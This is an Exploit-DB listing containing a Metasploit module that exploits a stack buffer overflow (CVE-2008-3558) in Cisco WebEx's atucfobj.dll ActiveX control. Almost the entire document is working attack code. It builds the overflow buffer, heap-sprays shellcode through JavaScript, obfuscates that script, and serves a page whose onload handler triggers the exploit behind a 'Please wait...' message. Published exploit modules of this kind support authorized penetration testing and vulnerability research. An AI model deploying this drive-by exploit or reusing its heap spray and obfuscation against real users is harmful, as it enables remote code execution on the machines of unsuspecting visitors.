Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit)

EDB-ID:

16604




Platform:

Windows

Date:

2010-09-20


##
# $Id: webex_ucf_newobject.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject
				ActiveX Control. If an long string is passed to the 'NewObject' method, a stack-
				based buffer overflow will occur when copying attacker-supplied data using the
				sprintf function.

				It is noteworthy that this vulnerability was discovered and reported by multiple
				independent researchers. To quote iDefense's advisory, "Before this issue was
				publicly reported, at least three independent security researchers had knowledge
				of this issue; thus, it is reasonable to believe that even more people were aware
				of this issue before disclosure."

				NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload
				into memory unmodified.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Tobias Klein',     # initial discoverer
					'Elazar Broad',     # initial discoverer
					'Guido Landi',      # milw0rm exploit
					'jduck'             # metasploit version
				],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2008-3558' ],
					[ 'OSVDB', '47344' ],
					[ 'BID', '30578' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/6220' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849' ],
					[ 'URL', 'http://www.trapkit.de/advisories/TKADV2008-009.txt' ],
					[ 'URL', 'http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html' ],
					[ 'URL', 'http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'DisableNops' => true
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Tested with atucfobj.dll v20.2008.2601.4928
					[ 'Windows Universal', { 'Ret' => 0x0c0c0c0c } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Aug 06 2008'))
	end

	def autofilter
		false
	end

	def check_dependencies
		use_zlib
	end

	def on_request_uri(cli, request)

		# ActiveX parameters
		progid = "WebexUCFObject.WebexUCFObject"
		clsid = "32E26FD9-F435-4A20-A561-35D4B987CFDC"

		# Set parameters
		fnname = rand_text_alpha(8+rand(8))
		offset = 232

		# Build the exploit buffer
		sploit = rand_text_alphanumeric(offset)
		sploit << [target.ret - 0x20000].pack('V')

		# Encode variables
		sploit = Rex::Text.to_hex(sploit, '%')
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Prepare the heap spray parameters
		spray_num = "0x%x" % target.ret

		# Generate the final javascript
		js = %Q|
function #{fnname}()
{
try {
var obj = new ActiveXObject("#{progid}");
var my_unescape = unescape;
var shellcode = '#{shellcode}';
#{js_heap_spray}
sprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000);
var sploit = my_unescape("#{sploit}");
obj.NewObject(sploit);
} catch( e ) { window.location = 'about:blank' ; }
}
|

		# Obfuscate the javascript
		opts = {
			'Strings' => true,
			'Symbols' => {
				'Variables' => %w{ obj my_unescape shellcode arg1 arg2 sploit }
			}
		}
		js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
		js.obfuscate()

		# Build the final HTML
		content = %Q|<html>
<head>
<script language=javascript>
#{js}
</script>
</head>
<body onload="#{fnname}()">
Please wait...
</body>
</html>
|

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

		send_response_html(cli, content)

		handler(cli)

	end

end